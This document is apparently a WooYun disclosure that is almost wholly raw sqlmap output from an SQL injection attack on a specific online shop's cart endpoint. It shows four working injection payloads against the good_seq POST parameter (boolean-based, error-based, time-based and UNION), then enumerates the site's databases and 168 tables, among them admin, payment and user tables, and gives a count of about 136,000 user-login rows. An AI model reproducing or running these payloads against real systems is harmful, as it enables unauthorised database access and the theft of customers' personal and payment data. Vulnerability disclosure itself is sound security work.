WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: good_seq (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND 2520=2520&good_price
=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT 4151 FROM(SE
LECT COUNT(*),CONCAT(0x71766b6271,(SELECT (ELT(4151=4151,1))),0x71706b7871,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&good_price=24
9&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT * FROM (SELE
CT(SLEEP(5)))YxAX)&good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_
option_set[]=&cart_count=1
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 UNION ALL SELECT NULL,CO
NCAT(0x71766b6271,0x59717577746261525468,0x71706b7871)-- &good_price=249&reurl=&
good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
---
[21:34:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.5
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] koyimall
[*] test
Database: koyimall
[168 tables]
+---------------------------------+
| alipay_login |
| durian_admin |
| durian_admin_auth |
| durian_admin_login |
| durian_admin_memo |
| durian_admin_menu |
| durian_admin_postit |
| durian_bank |
| durian_banner |
| durian_banner_click |
| durian_bbs_category |
| durian_bbs_comment |
| durian_bbs_data |
| durian_bbs_file |
| durian_bbs_setup |
| durian_bbs_vote |
| durian_buy |
| durian_buy_bill |
| durian_buy_change_log |
| durian_buy_claim |
| durian_buy_claim_goods |
| durian_buy_excel |
| durian_buy_excel_ext |
| durian_buy_ext |
| durian_buy_ext_set |
| durian_buy_goods |
| durian_buy_goods_status_log |
| durian_buy_recommend |
| durian_buy_stat |
| durian_calendar |
| durian_cart |
| durian_country |
| durian_coupon |
| durian_coupon_data |
| durian_coupon_file |
| durian_coupon_goods |
| durian_coupon_goods_give |
| durian_coupon_log |
| durian_coupon_policy |
| durian_customer_qna |
| durian_customer_qna_category |
| durian_customer_qna_reply |
| durian_delivery_area |
| durian_delivery_company |
| durian_delivery_cost |
| durian_delivery_cost_area |
| durian_delivery_extra |
| durian_delivery_policy |
| durian_delivery_policy_range |
| durian_design_flash |
| durian_design_font |
| durian_design_keyword |
| durian_design_layout |
| durian_design_module |
| durian_design_module_current |
| durian_design_module_reserve |
| durian_design_module_set |
| durian_design_module_set_bbs |
| durian_design_module_set_data |
| durian_design_page |
| durian_design_policy |
| durian_design_source |
| durian_design_tpl |
| durian_estimate |
| durian_estimate_goods |
| durian_event |
| durian_event_goods |
| durian_form_category |
| durian_form_data |
| durian_form_set |
| durian_form_setup |
| durian_good_brand |
| durian_good_category |
| durian_good_category_multi |
| durian_good_category_related |
| durian_good_category_style |
| durian_good_category_taobao |
| durian_good_check_option |
| durian_good_extend |
| durian_good_fabric_tip |
| durian_good_fabric_tip_title |
| durian_good_file |
| durian_good_main |
| durian_good_main_list |
| durian_good_maker |
| durian_good_option_grid |
| durian_good_option_grid_value |
| durian_good_option_set |
| durian_good_option_set_list |
| durian_good_option_set_value |
| durian_good_option_single |
| durian_good_option_single_value |
| durian_good_policy |
| durian_good_related |
| durian_good_stat |
| durian_good_tmp |
| durian_good_view |
| durian_goods |
| durian_icon |
| durian_icon_group |
| durian_keyword |
| durian_keyword_stat |
| durian_mail_auto |
| durian_mail_policy |
| durian_mail_result |
| durian_mail_send |
| durian_mail_tpl |
| durian_mail_tpl_category |
| durian_market_group |
| durian_market_group_log |
| durian_memo_policy |
| durian_memo_recv |
| durian_memo_send |
| durian_memo_tpl |
| durian_mileage_log |
| durian_mileage_pay |
| durian_mileage_policy |
| durian_pay |
| durian_point_log |
| durian_point_policy |
| durian_poll |
| durian_poll_answer |
| durian_poll_comment |
| durian_poll_vote |
| durian_popup |
| durian_popup_tpl |
| durian_redbean |
| durian_sf_barcode |
| durian_shop |
| durian_shop_account |
| durian_shop_company |
| durian_shop_domain |
| durian_shop_policy |
| durian_sms_auto |
| durian_sms_policy |
| durian_sms_result |
| durian_sms_send |
| durian_sms_tpl |
| durian_sms_tpl_category |
| durian_stat_check |
| durian_talk |
| durian_talk_policy |
| durian_user |
| durian_user_address |
| durian_user_deny |
| durian_user_join_ext |
| durian_user_join_policy |
| durian_user_level |
| durian_user_levelup_log |
| durian_user_login |
| durian_user_privacy |
| durian_user_provision |
| durian_user_recommend |
| durian_user_secede |
| durian_user_secede_poll |
| durian_user_secede_poll_data |
| durian_user_stat |
| durian_wish_list |
| durian_zipcode |
| gmay_gift_event |
| main_banner_info |
| main_banner_prd_info |
| main_plan_info |
| main_ranking_info |
| pay_alipay_return |
| pay_mileage_return |
| ranking_info |
| ranking_temp_info |
| durian_user_login | 136143 |